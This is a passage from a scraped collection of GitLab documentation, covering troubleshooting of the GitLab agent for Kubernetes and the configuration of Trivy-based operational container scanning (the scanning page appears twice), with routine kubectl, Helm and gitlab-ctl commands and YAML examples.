proxy. This error likely occurs when a response header is not included in the default allowlist for KAS. For steps on how to resolve this issue, see [blocked response headers](../../../administration/clusters/kas.md#error-blocked-kubernetes-api-proxy-response-header).
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Troubleshooting the GitLab agent for Kubernetes breadcrumbs: - doc - user - clusters - agent --- When you are using the GitLab agent for Kubernetes, you might experience issues you need to troubleshoot. You can start by viewing the service logs: ```shell kubectl logs -f -l=app.kubernetes.io/name=gitlab-agent -n gitlab-agent ``` If you are a GitLab administrator, you can also view the [GitLab agent server for Kubernetes logs](../../../administration/clusters/kas.md#troubleshooting). ## Transport: Error while dialing failed to WebSocket dial ```json { "level": "warn", "time": "2020-11-04T10:14:39.368Z", "msg": "GetConfiguration failed", "error": "rpc error: code = Unavailable desc = connection error: desc = \"transport: Error while dialing failed to WebSocket dial: failed to send handshake request: Get \\\"https://gitlab-kas:443/-/kubernetes-agent\\\": dial tcp: lookup gitlab-kas on 10.60.0.10:53: no such host\"" } ``` This error occurs when there are connectivity issues between the `kas-address` and your agent pod. To fix this issue, make sure the `kas-address` is accurate. ```json { "level": "error", "time": "2021-06-25T21:15:45.335Z", "msg": "Reverse tunnel", "mod_name": "reverse_tunnel", "error": "Connect(): rpc error: code = Unavailable desc = connection error: desc= \"transport: Error while dialing failed to WebSocket dial: expected handshake response status code 101 but got 301\"" } ``` This error occurs when the `kas-address` doesn't include a trailing slash. To fix this issue, make sure that the `wss` or `ws` URL ends with a trailing slash, like `wss://GitLab.host.tld:443/-/kubernetes-agent/` or `ws://GitLab.host.tld:80/-/kubernetes-agent/`. ## Error while dialing failed to WebSocket dial: failed to send handshake request ```json { "level": "warn", "time": "2020-10-30T09:50:51.173Z", "msg": "GetConfiguration failed", "error": "rpc error: code = Unavailable desc = connection error: desc = \"transport: Error while dialing failed to WebSocket dial: failed to send handshake request: Get \\\"https://GitLabhost.tld:443/-/kubernetes-agent\\\": net/http: HTTP/1.x transport connection broken: malformed HTTP response \\\"\\\\x00\\\\x00\\\\x06\\\\x04\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x05\\\\x00\\\\x00@\\\\x00\\\"\"" } ``` This error occurs when you configured `wss` as `kas-address` on the agent side, but the agent server is not available at `wss`. To fix this issue, make sure the same schemes are configured on both sides. ## Decompressor is not installed for grpc-encoding ```json { "level": "warn", "time": "2020-11-05T05:25:46.916Z", "msg": "GetConfiguration.Recv failed", "error": "rpc error: code = Unimplemented desc = grpc: Decompressor is not installed for grpc-encoding \"gzip\"" } ``` This error occurs when the version of the agent is newer that the version of the agent server (KAS). To fix it, make sure that both `agentk` and the agent server are the same version. ## Certificate signed by unknown authority ```json { "level": "error", "time": "2021-02-25T07:22:37.158Z", "msg": "Reverse tunnel", "mod_name": "reverse_tunnel", "error": "Connect(): rpc error: code = Unavailable desc = connection error: desc = \"transport: Error while dialing failed to WebSocket dial: failed to send handshake request: Get \\\"https://GitLabhost.tld:443/-/kubernetes-agent/\\\": x509: certificate signed by unknown authority\"" } ``` This error occurs when your GitLab instance is using a certificate signed by an internal certificate authority that is unknown to the agent. To fix this issue, you can present the CA certificate file to the agent by [customizing the Helm installation](install/_index.md#customize-the-helm-installation). Add `--set-file config.kasCaCert=my-custom-ca.pem` to the `helm install` command. The file should be a valid PEM or DER-encoded certificate. When you deploy `agentk` with a set `config.kasCaCert` value, the certificate is added to `configmap` and the certificate file is mounted in `/etc/ssl/certs`. For example, with the command `kubectl get configmap -lapp=gitlab-agent -o yaml`: ```yaml apiVersion: v1 items: - apiVersion: v1 data: ca.crt: |- -----BEGIN CERTIFICATE----- MIIFmzCCA4OgAwIBAgIUE+FvXfDpJ869UgJitjRX7HHT84cwDQYJKoZIhvcNAQEL ...truncated certificate... GHZCTQkbQyUwBWJOUyOxW1lro4hWqtP4xLj8Dpq1jfopH72h0qTGkX0XhFGiSaM= -----END CERTIFICATE----- kind: ConfigMap metadata: annotations: meta.helm.sh/release-name: self-signed meta.helm.sh/release-namespace: gitlab-agent-self-signed creationTimestamp: "2023-03-07T20:12:26Z" labels: app: gitlab-agent app.kubernetes.io/managed-by: Helm app.kubernetes.io/name: gitlab-agent app.kubernetes.io/version: v15.9.0 helm.sh/chart: gitlab-agent-1.11.0 name: self-signed-gitlab-agent resourceVersion: "263184207" kind: List ``` You might see a similar error in the [agent server (KAS) logs](../../../administration/logs/_index.md#gitlab-agent-server-for-kubernetes) of your GitLab application server: ```json {"level":"error","time":"2023-03-07T20:19:48.151Z","msg":"AgentInfo()","grpc_service":"gitlab.agent.agent_configuration.rpc.AgentConfiguration","grpc_method":"GetConfiguration","error":"Get \"https://gitlab.example.com/api/v4/internal/kubernetes/agent_info\": x509: certificate signed by unknown authority"} ``` To fix it, [install the public certificate of your internal CA](https://docs.gitlab.com/omnibus/settings/ssl/#install-custom-public-certificates) in the `/etc/gitlab/trusted-certs` directory. Alternatively, you can configure the agent server (KAS) to read the certificate from a custom directory. Add the following configuration to `/etc/gitlab/gitlab.rb`: ```ruby gitlab_kas['env'] = { 'SSL_CERT_DIR' => "/opt/gitlab/embedded/ssl/certs/" } ``` To apply the changes: 1. Reconfigure GitLab. ```shell sudo gitlab-ctl reconfigure ``` 1. Restart `gitlab-kas`. ```shell gitlab-ctl restart gitlab-kas ``` ## Error: `Failed to register agent pod` The agent pod logs might display the error message `Failed to register agent pod. Please make sure the agent version matches the server version`. To resolve this issue, ensure that the agent version matches the GitLab version. If the versions match and the error persists: 1. Make sure `gitlab-kas` is running with `gitlab-ctl status gitlab-kas`. 1. Check the `gitlab-kas` [logs](../../../administration/logs/_index.md#gitlab-agent-server-for-kubernetes) to make sure the agent is functioning properly. ## Failed to perform vulnerability scan on workload: jobs.batch already exists ```json { "level": "error", "time": "2022-06-22T21:03:04.769Z", "msg": "Failed to perform vulnerability scan on workload", "mod_name": "starboard_vulnerability", "error": "running scan job: creating job: jobs.batch \"scan-vulnerabilityreport-b8d497769\" already exists" } ``` The GitLab agent for Kubernetes performs vulnerability scans by creating a job to scan each workload. If a scan is interrupted, these jobs may be left behind and need to be cleaned up before more jobs can be run. You can clean up these jobs by running: ```shell kubectl delete jobs -l app.kubernetes.io/managed-by=starboard -n gitlab-agent ``` [We're working on making the cleanup of these jobs more robust.](https://gitlab.com/gitlab-org/gitlab/-/issues/362016) ## Parse error during installation When you install the agent, you might encounter an error that states: ```shell Error: parse error at (gitlab-agent/templates/observability-secret.yaml:1): unclosed action ``` This error is typically caused by an incompatible version of Helm. To resolve the issue, ensure that you are using a version of Helm [compatible with your version of Kubernetes](_index.md#supported-kubernetes-versions-for-gitlab-features). ## `GitLab Agent Server: Unauthorized` error on Dashboard for Kubernetes An error like `GitLab Agent Server: Unauthorized. Trace ID: <...>` on the [Dashboard for Kubernetes](../../../ci/environments/kubernetes_dashboard.md) page might be caused by one of the following: - The `user_access` entry in the agent configuration file doesn't exist or is wrong. To resolve, see [Grant users Kubernetes access](user_access.md). - There are multiple [`_gitlab_kas` cookies](../../../administration/clusters/kas.md#kubernetes-api-proxy-cookie) in the browser and sent to KAS. The most likely cause is multiple GitLab instances hosted on the same site. For example, `gitlab.com` set a `_gitlab_kas` cookie targeted for `kas.gitlab.com`, but the cookie is also sent to `kas.staging.gitlab.com`, which causes the error on `staging.gitlab.com`. To temporarily resolve, delete the `_gitlab_kas` cookie for `gitlab.com` from the browser cookie store. [Issue 418998](https://gitlab.com/gitlab-org/gitlab/-/issues/418998) proposes a fix for this known issue. - GitLab and KAS run on different sites. For example, GitLab on `gitlab.example.com` and KAS on `kas.example.com`. GitLab does not support this use case. For details, see [issue 416436](https://gitlab.com/gitlab-org/gitlab/-/issues/416436). ## Agent version mismatch In GitLab, on the **Agent** tab of the Kubernetes clusters page, you might see a warning that says `Agent version mismatch: The agent versions do not match each other across your cluster's pods.` This warning might be caused by an older version of the agent being cached by the agent server for Kubernetes (`kas`). Because `kas` periodically deletes outdated agent versions, you should wait at least 20 minutes for the agent and GitLab to reconcile. If the warning persists, update the agent installed on your cluster. ## Kubernetes API proxy response headers are lost or blocked HTTP response headers might get blocked when sent from the Kubernetes cluster to the user through the Kubernetes API proxy. This error likely occurs when a response header is not included in the default allowlist for KAS. For steps on how to resolve this issue, see [blocked response headers](../../../administration/clusters/kas.md#error-blocked-kubernetes-api-proxy-response-header).
https://docs.gitlab.com/user/clusters/vulnerabilities
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/vulnerabilities.md
2025-08-13
doc/user/clusters/agent
[ "doc", "user", "clusters", "agent" ]
vulnerabilities.md
Application Security Testing
Composition analysis
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Operational container scanning
Scans container images in a Kubernetes cluster for vulnerabilities.
{{< details >}} - Tier: Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Deprecated](https://gitlab.com/gitlab-org/gitlab/-/issues/368828) the starboard directive in GitLab 15.4. The starboard directive is scheduled for removal in GitLab 16.0. {{< /history >}} ## Supported architectures In GitLab agent for Kubernetes 16.10.0 and later and GitLab agent Helm Chart 1.25.0 and later, operational container scanning (OCS) is supported for `linux/arm64` and `linux/amd64`. For earlier versions, only `linux/amd64` is supported. ## Enable operational container scanning You can use OCS to scan container images in your cluster for security vulnerabilities. In GitLab agent for Kubernetes 16.9 and later, OCS uses a [wrapper image](https://gitlab.com/gitlab-org/security-products/analyzers/trivy-k8s-wrapper) around [Trivy](https://github.com/aquasecurity/trivy) to scan images for vulnerabilities. Before GitLab 16.9, OCS directly used the [Trivy](https://github.com/aquasecurity/trivy) image. OCS can be configured to run on a cadence by using `agent config` or a project's scan execution policy. {{< alert type="note" >}} If both `agent config` and `scan execution policies` are configured, the configuration from `scan execution policy` takes precedence. {{< /alert >}} ### Enable via agent configuration To enable scanning of images within your Kubernetes cluster via the agent configuration, add a `container_scanning` configuration block to your agent configuration with a `cadence` field containing a [CRON expression](https://en.wikipedia.org/wiki/Cron) for when the scans are run. ```yaml container_scanning: cadence: '0 0 * * *' # Daily at 00:00 (Kubernetes cluster time) ``` The `cadence` field is required. GitLab supports the following types of CRON syntax for the cadence field: - A daily cadence of once per hour at a specified hour, for example: `0 18 * * *` - A weekly cadence of once per week on a specified day and at a specified hour, for example: `0 13 * * 0` {{< alert type="note" >}} Other elements of the [CRON syntax](https://docs.oracle.com/cd/E12058_01/doc/doc.1014/e12030/cron_expressions.htm) may work in the cadence field if supported by the [cron](https://github.com/robfig/cron) we are using in our implementation, however, GitLab does not officially test or support them. {{< /alert >}} {{< alert type="note" >}} The CRON expression is evaluated in [UTC](https://www.timeanddate.com/worldclock/timezone/utc) using the system-time of the Kubernetes-agent pod. {{< /alert >}} By default, operational container scanning does not scan any workloads for vulnerabilities. You can set the `vulnerability_report` block with the `namespaces` field which can be used to select which namespaces are scanned. For example, if you would like to scan only the `default`, `kube-system` namespaces, you can use this configuration: ```yaml container_scanning: cadence: '0 0 * * *' vulnerability_report: namespaces: - default - kube-system ``` For every target namespace, all images in the following workload resources are scanned by default: - Pod - ReplicaSet - ReplicationController - StatefulSet - DaemonSet - CronJob - Job This can be customized by [configuring the Trivy Kubernetes Resource Detection](#configure-trivy-kubernetes-resource-detection). ### Enable via scan execution policies To enable scanning of images in your Kubernetes cluster by using scan execution policies, use the [scan execution policy editor](../../application_security/policies/scan_execution_policies.md#scan-execution-policy-editor) to create a new schedule rule. {{< alert type="note" >}} The Kubernetes agent must be running in your cluster to scan running container images {{< /alert >}} {{< alert type="note" >}} Operational Container Scanning operates independently of GitLab pipelines. It is fully automated and managed by the Kubernetes Agent, which initiates new scans at the scheduled time configured in the Scan Execution Policy. The agent creates a dedicated Job within your cluster to perform the scan and report findings back to GitLab. {{< /alert >}} Here is an example of a policy which enables operational container scanning within the cluster the Kubernetes agent is attached to: ```yaml - name: Enforce Container Scanning in cluster connected through my-gitlab-agent for default and kube-system namespaces enabled: true rules: - type: schedule cadence: '0 10 * * *' agents: <agent-name>: namespaces: - 'default' - 'kube-system' actions: - scan: container_scanning ``` The keys for a schedule rule are: - `cadence` (required): a [CRON expression](https://docs.oracle.com/cd/E12058_01/doc/doc.1014/e12030/cron_expressions.htm) for when the scans are run - `agents:<agent-name>` (required): The name of the agent to use for scanning - `agents:<agent-name>:namespaces` (required): The Kubernetes namespaces to scan. {{< alert type="note" >}} Other elements of the [CRON syntax](https://docs.oracle.com/cd/E12058_01/doc/doc.1014/e12030/cron_expressions.htm) may work in the cadence field if supported by the [cron](https://github.com/robfig/cron) we are using in our implementation, however, GitLab does not officially test or support them. {{< /alert >}} {{< alert type="note" >}} The CRON expression is evaluated in [UTC](https://www.timeanddate.com/worldclock/timezone/utc) using the system-time of the Kubernetes-agent pod. {{< /alert >}} You can view the complete schema within the [scan execution policy documentation](../../application_security/policies/scan_execution_policies.md#scan-execution-policies-schema). ## OCS vulnerability resolution for multi cluster configuration To ensure accurate vulnerability tracking with OCS, you should create a separate GitLab project with OCS enabled for each cluster. If you have multiple clusters, be sure to use one project for each cluster. OCS resolves vulnerabilities that are no longer found in your cluster after each scan by comparing the current scan vulnerabilities with those previously detected. Any vulnerabilities from earlier scans that are no longer present in the current scan are resolved for the GitLab project. If multiple clusters are configured in the same project, an OCS scan in one cluster (for example, Project A) would resolve previously detected vulnerabilities from another cluster (for example, Project B), leading to incorrect vulnerability reporting. ## Configure scanner resource requirements By default the scanner pod's default resource requirements are: ```yaml requests: cpu: 100m memory: 100Mi ephemeral_storage: 1Gi limits: cpu: 500m memory: 500Mi ephemeral_storage: 3Gi ``` You can customize it with a `resource_requirements` field. ```yaml container_scanning: resource_requirements: requests: cpu: '0.2' memory: 200Mi ephemeral_storage: 2Gi limits: cpu: '0.7' memory: 700Mi ephemeral_storage: 4Gi ``` When using a fractional value for CPU, format the value as a string. {{< alert type="note" >}} - Resource requirements can only be set by using the agent configuration. If you enabled Operational Container Scanning through scan execution policies and need to configure resource requirements, you should do so via the agent configuration file. - When using Google Kubernetes Engine (GKE) for Kubernetes orchestration, [the ephemeral storage limit value will always be set to equal the request value](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-resource-requests#resource-limits). This is enforced by GKE. {{< /alert >}} ## Custom repository for Trivy K8s Wrapper During a scan, OCS deploys pods using an image from the [Trivy K8s Wrapper repository](https://gitlab.com/security-products/trivy-k8s-wrapper/container_registry/5992609), which transmits the vulnerability report generated by [Trivy Kubernetes](https://aquasecurity.github.io/trivy/v0.54/docs/target/kubernetes) to OCS. If your cluster's firewall restricts access to the Trivy K8s Wrapper repository, you can configure OCS to pull the image from a custom repository. Ensure that the custom repository mirrors the Trivy K8s Wrapper repository for compatibility. ```yaml container_scanning: trivy_k8s_wrapper_image: repository: "your-custom-registry/your-image-path" ``` ## Configure scan timeout {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/497460) in GitLab 17.7. {{< /history >}} By default, the Trivy scan times out after five minutes. The agent itself provides an extra 15 minutes to read the chained configmaps and transmit the vulnerabilities. To customize the Trivy timeout duration: - Specify the duration in seconds with the `scanner_timeout` field. For example: ```yaml container_scanning: scanner_timeout: "3600s" # 60 minutes ``` ## Configure Trivy report size {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/497460) in GitLab 17.7. {{< /history >}} By default, the Trivy report is limited to 100 MB, which is sufficient for most scans. However, if you have a lot of workloads, you might need to increase the limit. To do this: - Specify the limit in bytes with the `report_max_size` field. For example: ```yaml container_scanning: report_max_size: "300000000" # 300 MB ``` ## Configure Trivy Kubernetes resource detection {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/431707) in GitLab 17.9. {{< /history >}} By default, Trivy looks for the following Kubernetes resource types to discover scannable images: - Pod - ReplicaSet - ReplicationController - StatefulSet - DaemonSet - CronJob - Job - Deployment You can limit the Kubernetes resource types that Trivy discovers, for example to only scan "active" images. To do this: - Specify the resource types with the `resource_types` field: ```yaml container_scanning: vulnerability_report: resource_types: - Deployment - Pod - Job ``` ## Configure Trivy report artifact deletion {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/480845) in GitLab 17.9. {{< /history >}} By default, the GitLab agent for Kubernetes deletes the Trivy report artifact after a scan has completed. You can configure the agent to preserve the report artifact, so you can view the report in its raw state. To do this: - Set `delete_report_artifact` to `false`: ```yaml container_scanning: delete_report_artifact: false ``` ## View cluster vulnerabilities To view vulnerability information in GitLab: 1. On the left sidebar, select **Search or go to** and find the project that contains the agent configuration file. 1. Select **Operate > Kubernetes clusters**. 1. Select the **Agent** tab. 1. Select an agent to view the cluster vulnerabilities. ![Cluster agent security tab UI](img/cluster_agent_security_tab_v14_8.png) This information can also be found under [operational vulnerabilities](../../application_security/vulnerability_report/_index.md#operational-vulnerabilities). {{< alert type="note" >}} You must have at least the Developer role. {{< /alert >}} ## Scanning private images {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/415451) in GitLab 16.4. {{< /history >}} To scan private images, the scanner relies on the image pull secrets (direct references and from the service account) to pull the image. ## Known issues In GitLab agent for Kubernetes 16.9 and later, operational container scanning: - Handles Trivy reports of up to 100 MB. For previous releases, this limit is 10 MB. - Is disabled when the GitLab agent for Kubernetes runs in `fips` mode. ## Troubleshooting ### `Error running Trivy scan. Container terminated reason: OOMKilled` OCS might fail with an OOM error if there are too many resources to be scanned or if the images being scanned are large. To resolve this, [configure the resource requirement](#configure-scanner-resource-requirements) to increase the amount of memory available. ### `Pod ephemeral local storage usage exceeds the total limit of containers` OCS scans could fail for Kubernetes clusters that have low default ephemeral storage. For example, [GKE autopilot](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-resource-requests#defaults) sets the default ephemeral storage to 1 GB. This is an issue for OCS when scanning namespaces with large images, as there may not be enough space to store all data necessary for OCS. To resolve this, [configure the resource requirement](#configure-scanner-resource-requirements) to increase the amount of ephemeral storage available. Another message indicative of this issue may be: `OCS Scanning pod evicted due to low resources. Please configure higher resource limits.` ### `Error running Trivy scan due to context timeout` OCS might fail to complete a scan if it takes Trivy too long to complete the scan. The default scan timeout is 5 minutes, with an extra 15 minutes for the agent to read the results and transmit the vulnerabilities. To resolve this, [configure the scanner timeout](#configure-scan-timeout) to increase the amount of memory available. ### `trivy report size limit exceeded` OCS might fail with this error if the generated Trivy report size is larger than the default maximum limit. To resolve this, [configure the max Trivy report size](#configure-trivy-report-size) to increase the maximum allowed size of the Trivy report.
--- stage: Application Security Testing group: Composition analysis info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments description: Scans container images in a Kubernetes cluster for vulnerabilities. title: Operational container scanning breadcrumbs: - doc - user - clusters - agent --- {{< details >}} - Tier: Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Deprecated](https://gitlab.com/gitlab-org/gitlab/-/issues/368828) the starboard directive in GitLab 15.4. The starboard directive is scheduled for removal in GitLab 16.0. {{< /history >}} ## Supported architectures In GitLab agent for Kubernetes 16.10.0 and later and GitLab agent Helm Chart 1.25.0 and later, operational container scanning (OCS) is supported for `linux/arm64` and `linux/amd64`. For earlier versions, only `linux/amd64` is supported. ## Enable operational container scanning You can use OCS to scan container images in your cluster for security vulnerabilities. In GitLab agent for Kubernetes 16.9 and later, OCS uses a [wrapper image](https://gitlab.com/gitlab-org/security-products/analyzers/trivy-k8s-wrapper) around [Trivy](https://github.com/aquasecurity/trivy) to scan images for vulnerabilities. Before GitLab 16.9, OCS directly used the [Trivy](https://github.com/aquasecurity/trivy) image. OCS can be configured to run on a cadence by using `agent config` or a project's scan execution policy. {{< alert type="note" >}} If both `agent config` and `scan execution policies` are configured, the configuration from `scan execution policy` takes precedence. {{< /alert >}} ### Enable via agent configuration To enable scanning of images within your Kubernetes cluster via the agent configuration, add a `container_scanning` configuration block to your agent configuration with a `cadence` field containing a [CRON expression](https://en.wikipedia.org/wiki/Cron) for when the scans are run. ```yaml container_scanning: cadence: '0 0 * * *' # Daily at 00:00 (Kubernetes cluster time) ``` The `cadence` field is required. GitLab supports the following types of CRON syntax for the cadence field: - A daily cadence of once per hour at a specified hour, for example: `0 18 * * *` - A weekly cadence of once per week on a specified day and at a specified hour, for example: `0 13 * * 0` {{< alert type="note" >}} Other elements of the [CRON syntax](https://docs.oracle.com/cd/E12058_01/doc/doc.1014/e12030/cron_expressions.htm) may work in the cadence field if supported by the [cron](https://github.com/robfig/cron) we are using in our implementation, however, GitLab does not officially test or support them. {{< /alert >}} {{< alert type="note" >}} The CRON expression is evaluated in [UTC](https://www.timeanddate.com/worldclock/timezone/utc) using the system-time of the Kubernetes-agent pod. {{< /alert >}} By default, operational container scanning does not scan any workloads for vulnerabilities. You can set the `vulnerability_report` block with the `namespaces` field which can be used to select which namespaces are scanned. For example, if you would like to scan only the `default`, `kube-system` namespaces, you can use this configuration: ```yaml container_scanning: cadence: '0 0 * * *' vulnerability_report: namespaces: - default - kube-system ``` For every target namespace, all images in the following workload resources are scanned by default: - Pod - ReplicaSet - ReplicationController - StatefulSet - DaemonSet - CronJob - Job This can be customized by [configuring the Trivy Kubernetes Resource Detection](#configure-trivy-kubernetes-resource-detection). ### Enable via scan execution policies To enable scanning of images in your Kubernetes cluster by using scan execution policies, use the [scan execution policy editor](../../application_security/policies/scan_execution_policies.md#scan-execution-policy-editor) to create a new schedule rule. {{< alert type="note" >}} The Kubernetes agent must be running in your cluster to scan running container images {{< /alert >}} {{< alert type="note" >}} Operational Container Scanning operates independently of GitLab pipelines. It is fully automated and managed by the Kubernetes Agent, which initiates new scans at the scheduled time configured in the Scan Execution Policy. The agent creates a dedicated Job within your cluster to perform the scan and report findings back to GitLab. {{< /alert >}} Here is an example of a policy which enables operational container scanning within the cluster the Kubernetes agent is attached to: ```yaml - name: Enforce Container Scanning in cluster connected through my-gitlab-agent for default and kube-system namespaces enabled: true rules: - type: schedule cadence: '0 10 * * *' agents: <agent-name>: namespaces: - 'default' - 'kube-system' actions: - scan: container_scanning ``` The keys for a schedule rule are: - `cadence` (required): a [CRON expression](https://docs.oracle.com/cd/E12058_01/doc/doc.1014/e12030/cron_expressions.htm) for when the scans are run - `agents:<agent-name>` (required): The name of the agent to use for scanning - `agents:<agent-name>:namespaces` (required): The Kubernetes namespaces to scan. {{< alert type="note" >}} Other elements of the [CRON syntax](https://docs.oracle.com/cd/E12058_01/doc/doc.1014/e12030/cron_expressions.htm) may work in the cadence field if supported by the [cron](https://github.com/robfig/cron) we are using in our implementation, however, GitLab does not officially test or support them. {{< /alert >}} {{< alert type="note" >}} The CRON expression is evaluated in [UTC](https://www.timeanddate.com/worldclock/timezone/utc) using the system-time of the Kubernetes-agent pod. {{< /alert >}} You can view the complete schema within the [scan execution policy documentation](../../application_security/policies/scan_execution_policies.md#scan-execution-policies-schema). ## OCS vulnerability resolution for multi cluster configuration To ensure accurate vulnerability tracking with OCS, you should create a separate GitLab project with OCS enabled for each cluster. If you have multiple clusters, be sure to use one project for each cluster. OCS resolves vulnerabilities that are no longer found in your cluster after each scan by comparing the current scan vulnerabilities with those previously detected. Any vulnerabilities from earlier scans that are no longer present in the current scan are resolved for the GitLab project. If multiple clusters are configured in the same project, an OCS scan in one cluster (for example, Project A) would resolve previously detected vulnerabilities from another cluster (for example, Project B), leading to incorrect vulnerability reporting. ## Configure scanner resource requirements By default the scanner pod's default resource requirements are: ```yaml requests: cpu: 100m memory: 100Mi ephemeral_storage: 1Gi limits: cpu: 500m memory: 500Mi ephemeral_storage: 3Gi ``` You can customize it with a `resource_requirements` field. ```yaml container_scanning: resource_requirements: requests: cpu: '0.2' memory: 200Mi ephemeral_storage: 2Gi limits: cpu: '0.7' memory: 700Mi ephemeral_storage: 4Gi ``` When using a fractional value for CPU, format the value as a string. {{< alert type="note" >}} - Resource requirements can only be set by using the agent configuration. If you enabled Operational Container Scanning through scan execution policies and need to configure resource requirements, you should do so via the agent configuration file. - When using Google Kubernetes Engine (GKE) for Kubernetes orchestration, [the ephemeral storage limit value will always be set to equal the request value](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-resource-requests#resource-limits). This is enforced by GKE. {{< /alert >}} ## Custom repository for Trivy K8s Wrapper During a scan, OCS deploys pods using an image from the [Trivy K8s Wrapper repository](https://gitlab.com/security-products/trivy-k8s-wrapper/container_registry/5992609), which transmits the vulnerability report generated by [Trivy Kubernetes](https://aquasecurity.github.io/trivy/v0.54/docs/target/kubernetes) to OCS. If your cluster's firewall restricts access to the Trivy K8s Wrapper repository, you can configure OCS to pull the image from a custom repository. Ensure that the custom repository mirrors the Trivy K8s Wrapper repository for compatibility. ```yaml container_scanning: trivy_k8s_wrapper_image: repository: "your-custom-registry/your-image-path" ``` ## Configure scan timeout {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/497460) in GitLab 17.7. {{< /history >}} By default, the Trivy scan times out after five minutes. The agent itself provides an extra 15 minutes to read the chained configmaps and transmit the vulnerabilities. To customize the Trivy timeout duration: - Specify the duration in seconds with the `scanner_timeout` field. For example: ```yaml container_scanning: scanner_timeout: "3600s" # 60 minutes ``` ## Configure Trivy report size {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/497460) in GitLab 17.7. {{< /history >}} By default, the Trivy report is limited to 100 MB, which is sufficient for most scans. However, if you have a lot of workloads, you might need to increase the limit. To do this: - Specify the limit in bytes with the `report_max_size` field. For example: ```yaml container_scanning: report_max_size: "300000000" # 300 MB ``` ## Configure Trivy Kubernetes resource detection {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/431707) in GitLab 17.9. {{< /history >}} By default, Trivy looks for the following Kubernetes resource types to discover scannable images: - Pod - ReplicaSet - ReplicationController - StatefulSet - DaemonSet - CronJob - Job - Deployment You can limit the Kubernetes resource types that Trivy discovers, for example to only scan "active" images. To do this: - Specify the resource types with the `resource_types` field: ```yaml container_scanning: vulnerability_report: resource_types: - Deployment - Pod - Job ``` ## Configure Trivy report artifact deletion {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/480845) in GitLab 17.9. {{< /history >}} By default, the GitLab agent for Kubernetes deletes the Trivy report artifact after a scan has completed. You can configure the agent to preserve the report artifact, so you can view the report in its raw state. To do this: - Set `delete_report_artifact` to `false`: ```yaml container_scanning: delete_report_artifact: false ``` ## View cluster vulnerabilities To view vulnerability information in GitLab: 1. On the left sidebar, select **Search or go to** and find the project that contains the agent configuration file. 1. Select **Operate > Kubernetes clusters**. 1. Select the **Agent** tab. 1. Select an agent to view the cluster vulnerabilities. ![Cluster agent security tab UI](img/cluster_agent_security_tab_v14_8.png) This information can also be found under [operational vulnerabilities](../../application_security/vulnerability_report/_index.md#operational-vulnerabilities). {{< alert type="note" >}} You must have at least the Developer role. {{< /alert >}} ## Scanning private images {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/415451) in GitLab 16.4. {{< /history >}} To scan private images, the scanner relies on the image pull secrets (direct references and from the service account) to pull the image. ## Known issues In GitLab agent for Kubernetes 16.9 and later, operational container scanning: - Handles Trivy reports of up to 100 MB. For previous releases, this limit is 10 MB. - Is disabled when the GitLab agent for Kubernetes runs in `fips` mode. ## Troubleshooting ### `Error running Trivy scan. Container terminated reason: OOMKilled` OCS might fail with an OOM error if there are too many resources to be scanned or if the images being scanned are large. To resolve this, [configure the resource requirement](#configure-scanner-resource-requirements) to increase the amount of memory available. ### `Pod ephemeral local storage usage exceeds the total limit of containers` OCS scans could fail for Kubernetes clusters that have low default ephemeral storage. For example, [GKE autopilot](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-resource-requests#defaults) sets the default ephemeral storage to 1 GB. This is an issue for OCS when scanning namespaces with large images, as there may not be enough space to store all data necessary for OCS. To resolve this, [configure the resource requirement](#configure-scanner-resource-requirements) to increase the amount of ephemeral storage available. Another message indicative of this issue may be: `OCS Scanning pod evicted due to low resources. Please configure higher resource limits.` ### `Error running Trivy scan due to context timeout` OCS might fail to complete a scan if it takes Trivy too long to complete the scan. The default scan timeout is 5 minutes, with an extra 15 minutes for the agent to read the results and transmit the vulnerabilities. To resolve this, [configure the scanner timeout](#configure-scan-timeout) to increase the amount of memory available. ### `trivy report size limit exceeded` OCS might fail with this error if the generated Trivy report size is larger than the default maximum limit. To resolve this, [configure the max Trivy report size](#configure-trivy-report-size) to increase the maximum allowed size of the Trivy report.
https://docs.gitlab.com/user/clusters/gitops
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/gitops.md
2025-08-13
doc/user/clusters/agent
[ "doc", "user", "clusters", "agent" ]
gitops.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Using GitOps with a Kubernetes cluster
null
